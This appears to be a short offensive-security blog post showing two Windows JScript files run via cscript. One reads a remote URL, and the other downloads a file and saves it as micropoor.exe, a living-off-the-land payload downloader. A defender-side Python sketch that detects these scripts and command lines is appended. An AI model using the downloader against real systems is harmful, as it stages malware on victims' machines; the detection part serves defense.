Focused on APT attack and defense
https://micropoor.blogspot.com/
All versions of Windows support JS by default, and a script can be invoked through cscript to download a payload.
Target machine: Windows 2003
Read:
C:\test>cscript /nologo downfile.js http://192.168.1.115/robots.txt
Code:
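// Create the WinHTTP COM object that ships with Windows.
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
// Synchronous GET to the URL passed as the first command-line argument.
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
// Print the response body as text to the console.
WScript.Echo(WinHttpReq.ResponseText);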
Write:
C:\test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt
Code:
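// Create the WinHTTP COM object that ships with Windows.
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
// Synchronous GET to the URL passed as the first command-line argument.
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
// Write the raw response bytes to disk through an ADODB.Stream.
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; // 1 = adTypeBinary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
// Saved under a fixed name in the current working directory.
BinStream.SaveToFile("micropoor.exe");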
Afterword: simple, easy to use, lightweight.
Micropoor
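A defender-side triage sketch for the two scripts above, added here as an example (Python, not code from the original post): it statically classifies a WSH script as fetch-only or download-to-disk from the COM ProgIDs and calls those scripts use, and matches the cscript command-line shape shown above in process-creation logs. The function names, the executable-extension list and the benign sample command line are assumptions made for the illustration.

```python
import re

# ProgIDs and calls taken from the two scripts on this page.
HTTP = re.compile(r'ActiveXObject\(\s*["\']WinHttp\.WinHttpRequest\.5\.1["\']', re.I)
STREAM = re.compile(r'ActiveXObject\(\s*["\']ADODB\.Stream["\']', re.I)
SAVE = re.compile(r'\.SaveToFile\(\s*["\']([^"\']+)["\']', re.I)
ARGV_URL = re.compile(r'\.Open\(\s*["\']GET["\']\s*,\s*WScript\.Arguments', re.I)
# Script host + .js file + URL argument, as in the command lines above.
CMD = re.compile(r'\b[cw]script(?:\.exe)?\b.*?(\S+\.js)\b.*?(https?://\S+)', re.I)
EXEC_EXT = (".exe", ".dll", ".scr", ".com")  # assumed list, extend as needed

def classify_script(src):
    """Static triage of WSH JScript source: does it fetch, and does it write?"""
    if not HTTP.search(src):
        return {"verdict": "no-http"}
    saved = SAVE.search(src) if STREAM.search(src) else None
    name = saved.group(1) if saved else None
    return {
        "verdict": "download-to-disk" if saved else "fetch-only",
        "url_from_argv": bool(ARGV_URL.search(src)),
        "saved_as": name,
        "writes_executable": bool(name) and name.lower().endswith(EXEC_EXT),
    }

def match_cmdline(cmdline):
    """Return script and URL if a process command line has the shape above."""
    m = CMD.search(cmdline)
    return {"script": m.group(1), "url": m.group(2)} if m else None

# Sample input: the page's two scripts, embedded for offline use.
READ_JS = '''var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);'''
WRITE_JS = READ_JS.rsplit("\n", 1)[0] + '''
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");'''

if __name__ == "__main__":
    print(classify_script(READ_JS))
    print(classify_script(WRITE_JS))
    # First line is from the page; the second is a constructed benign case.
    for line in (r"cscript /nologo dowfile2.js http://192.168.1.115/robots.txt",
                 r"cscript /nologo C:\scripts\backup.js"):
        print(line, "->", match_cmdline(line))
```

Plain string matching like this is a first-pass triage over script files and process command lines; pair it with network telemetry for script-host processes making outbound HTTP requests.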